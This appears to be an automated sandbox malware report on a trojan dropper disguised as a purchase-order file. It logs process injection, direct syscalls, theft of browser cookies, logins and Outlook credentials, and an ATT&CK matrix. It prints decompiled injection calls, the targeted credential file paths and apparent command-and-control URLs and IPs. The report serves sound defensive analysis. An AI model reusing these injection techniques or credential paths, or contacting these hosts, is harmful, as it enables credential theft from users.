                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A0 mov eax, dword ptr fs:[00000030h]1_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028509AD mov eax, dword ptr fs:[00000030h]1_2_028509AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028509AD mov eax, dword ptr fs:[00000030h]1_2_028509AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D89B3 mov esi, dword ptr fs:[00000030h]1_2_028D89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D89B3 mov eax, dword ptr fs:[00000030h]1_2_028D89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D89B3 mov eax, dword ptr fs:[00000030h]1_2_028D89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291A9D3 mov eax, dword ptr fs:[00000030h]1_2_0291A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E69C0 mov eax, dword ptr fs:[00000030h]1_2_028E69C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h]1_2_0285A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h]1_2_0285A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h]1_2_0285A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h]1_2_0285A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h]1_2_0285A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A9D0 mov eax, dword ptr fs:[00000030h]1_2_0285A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028849D0 mov eax, dword ptr fs:[00000030h]1_2_028849D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DE9E0 mov eax, dword ptr fs:[00000030h]1_2_028DE9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028829F9 mov eax, dword ptr fs:[00000030h]1_2_028829F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028829F9 mov eax, dword ptr fs:[00000030h]1_2_028829F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE908 mov eax, dword ptr fs:[00000030h]1_2_028CE908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE908 mov eax, dword ptr fs:[00000030h]1_2_028CE908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02848918 mov eax, dword ptr fs:[00000030h]1_2_02848918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02848918 mov eax, dword ptr fs:[00000030h]1_2_02848918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DC912 mov eax, dword ptr fs:[00000030h]1_2_028DC912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E892B mov eax, dword ptr fs:[00000030h]1_2_028E892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D892A mov eax, dword ptr fs:[00000030h]1_2_028D892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D0946 mov eax, dword ptr fs:[00000030h]1_2_028D0946
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num7, length, 12288, 64)
                Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num37 + 8, ref buffer, 4, ref bytesWritten)
                Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num14, payload, bufferSize, ref bytesWritten)
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeThread register set: target process: 984Jump to behavior
                Source: C:\Windows\SysWOW64\sc.exeThread APC queued: target process: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7AD008Jump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeQueries volume information: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Service Execution
                1
                Windows Service
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                LSASS Memory113
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Windows Service
                1
                Abuse Elevation Control Mechanism
                Security Account Manager121
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook612
                Process Injection
                41
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets41
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt612
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559084 Sample: New Order - RCII900718_Cont... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 31 www.avalanchefi.xyz 2->31 33 r0lqcud7.nbnnn.xyz 2->33 35 6 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus / Scanner detection for submitted sample 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 7 other signatures 2->53 10 New Order - RCII900718_Contract Drafting.exe 1 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 New Order - RCII90...ct Drafting.exe.log, CSV 10->29 dropped 65 Writes to foreign memory regions 10->65 67 Allocates memory in foreign processes 10->67 69 Injects a PE file into a foreign processes 10->69 14 RegAsm.exe 10->14         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 17 ZrTbKDhAWYKJu.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 sc.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 ZrTbKDhAWYKJu.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 bloodbalancecaps.shop 108.179.253.197, 49811, 80 UNIFIEDLAYER-AS-1US United States 23->37 39 r0lqcud7.nbnnn.xyz 23.225.159.42, 50011, 50012, 50013 CNSERVERSUS United States 23->39 41 2 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                New Order - RCII900718_Contract Drafting.exe32%ReversingLabsByteCode-MSIL.Trojan.Generic
                New Order - RCII900718_Contract Drafting.exe33%VirustotalBrowse
                New Order - RCII900718_Contract Drafting.exe100%AviraTR/Dropper.MSIL.Gen
                New Order - RCII900718_Contract Drafting.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                www.avalanchefi.xyz0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://www.avalanchefi.xyz/ctta/?At=4ZW0&Vblddl=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4=0%Avira URL Cloudsafe
                http://www.jalan2.online/xu9o/?Vblddl=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&At=4ZW00%Avira URL Cloudsafe
                http://www.laohub10.net0%Avira URL Cloudsafe
                http://www.laohub10.net/dfeq/0%Avira URL Cloudsafe
                http://www.bloodbalancecaps.shop/7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=&At=4ZW00%Avira URL Cloudsafe
                http://www.avalanchefi.xyz/ctta/0%Avira URL Cloudsafe
                http://bloodbalancecaps.shop/7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR50%Avira URL Cloudsafe
                http://www.jalan2.online/xu9o/0%Avira URL Cloudsafe
                http://www.laohub10.net/dfeq/?Vblddl=gAXULa6m81FP6NaNWEaqYxdrDcJADutaGDMyuCCNna1Q7N6mqkEUlVDne0yRrfV+N8trXlbxkU4RIowztTRv+FQMMrCoDDJ1FGnXoByL22JcZjp7VwlUZtI=&At=4ZW00%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
